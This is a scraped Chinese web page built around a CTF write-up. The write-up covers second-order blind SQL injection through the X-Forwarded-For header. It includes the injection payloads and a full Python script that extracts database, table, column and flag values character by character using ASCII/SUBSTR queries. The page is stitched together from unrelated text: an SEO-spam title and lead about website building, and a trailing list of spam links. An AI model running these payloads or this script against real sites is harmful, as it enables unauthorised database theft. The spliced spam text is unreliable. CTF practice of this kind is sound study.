当前位置: 首页 > news >正文

网站建设+开源wordpress 标签挂件

网站建设+开源,wordpress 标签挂件,合肥专业做淘宝网站推广,上海网站策划这几天也是ctf做得有点头疼了。好些序列化的题没碰#xff0c;一直做些sql注入类的题目。闲来无事#xff0c;在更一次sql注入吧。 整个页面就这点信息。首先想想为什么他能获取你的ip。猜测是数据包X-Forwarded-For。 它还输出上次访问页面客户端的ip。很明显了#xff0c…这几天也是ctf做得有点头疼了。好些序列化的题没碰一直做些sql注入类的题目。闲来无事在更一次sql注入吧。 整个页面就这点信息。首先想想为什么他能获取你的ip。猜测是数据包X-Forwarded-For。  它还输出上次访问页面客户端的ip。很明显了多半是二次注入 X-Forwarded-For:0or 1 or0 当构造这样的payload的时候。 1.先构造payload点击发送 2.在换一个随便的ip点击发送  3.在次点击发送 last ip就变成1了。说明的确是sql二次注入  这个原理就和上次网鼎杯那个sql注入一样。要是使用传统的注入就太慢了。因此我们构造这样的payload 0 (ASCII(SUBSTR((select group_concat(schema_name) from information_schema.schemata),1,1))) 0 sql语句的含义是将数据库的第一个字母的ascii码于0相加。(mysql数据库是运算符) 这个last ip就等于105了。这关也没过滤啥。通过这个方法就可以构造脚本了。 import requests flag urlhttp://node5.buuoj.cn:25578/ for i in range(1,500):srequests.session()# (ASCII(SUBSTR((select group_concat(schema_name) from information_schema.schemata),{},1)))# (ASCII(SUBSTR((select(group_concat(table_name))FROM(information_schema.TABLES)where(table_schema)F4l9_D4t4B45e),{},1)))# F4l9_t4b1e# (ASCII(SUBSTR((select(group_concat(column_name))from(information_schema.columns)where(table_nameF4l9_t4b1e)),{},1)))# F4l9_C01uMn# (ASCII(SUBSTR((select(group_concat(F4l9_C01uMn))from(F4l9_t4b1e)),1,1)))headers{X-Forwarded-For:0(ASCII(SUBSTR((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)),{},1)))0.format(i),Cookie:_gaGA1.1.1748561756.1709982957; _ga_0WLTHS96P4GS1.1.1709982957.1.1.1709982979.0.0.0; track_uuid87ee5b24-ee01-43dc-ee18-fca0644f3e53}headers1{X-Forwarded-For:1,Cookie:_gaGA1.1.1748561756.1709982957; _ga_0WLTHS96P4GS1.1.1709982957.1.1.1709982979.0.0.0; track_uuid87ee5b24-ee01-43dc-ee18-fca0644f3e53}datas.get(url,headersheaders)data1s.get(url,headersheaders1)data2s.get(url,headersheaders1)ydata2.textxy.split(\n)[-1]zx[9:]flagflagchr(int(z.split( )[0]))print(flag) 最后还要注意的一点就是这里是跨库查询。flag不在当前数据库。我们第一步必须要先爆库名。  最后一步获取数据是也别忘记F4l9_D4t4B45e.F4l9_t4b1e,代表F4l9_D4t4B45e数据库下的F4l9_t4b1e表。 这就是最后跑出来的结果了
http://www.pierceye.com/news/419851/

相关文章:

  • 视觉中国设计网站做音乐网站
  • 金坛区建设工程质量监督网站西宁百姓网免费发布信息
  • 运维 网站开发网站如何引入流量
  • 网站建设泉州效率网络西安网站设计公司哪家好
  • 青羊建站报价网上能注册公司吗怎么注册
  • 免费网站虚拟主机整站seo技术搜索引擎优化
  • 青岛网站建设订做油画风网站
  • 网站备案名称的影响吗六安哪里有做推广网站
  • 网站建设策划书网站发布与推广长沙公司网站费用
  • 设计网页英语口碑优化seo
  • 试客那个网站做的好北京做软件开发的公司
  • 网站多套系统如何调用网页大图素材
  • 沧州网站建设方案咨询wordpress需要 伪静态
  • 安徽省住房和城乡建设部网站郑州百姓网免费发布信息
  • 电子商务网站开发是指聊城市城乡建设部网站查询
  • 聊天室网站模板国内市场调研公司
  • 网站做不做备案有什么区别网站媒体给房开做内容推广
  • 昆明专业网站建设模板蚌埠app制作公司
  • 平面ui设计网站网页布局设计类型
  • 东莞企石网站建设网站怎么留住用户
  • 公司网站虚假宣传但网站不是我做的wordpress自豪地采用修改
  • 山西大同网站建设哪家好宜宾seo快速排名
  • 网站为什么做黄词骗流量网站图标在哪里修改
  • 手机移动端网站建设青岛门户网站建设
  • 专业APP客户端做网站php完整电商网站开发源码
  • 网站代码500网站的页面风格是什么
  • 电商开发网站公司腾讯营销平台
  • 商务网站是什么网站建设技术有哪些
  • 专门做团购的网站有哪些微信小程序开发者工具官网下载
  • 网站开发的项目需求山东省住房和城乡建设厅电话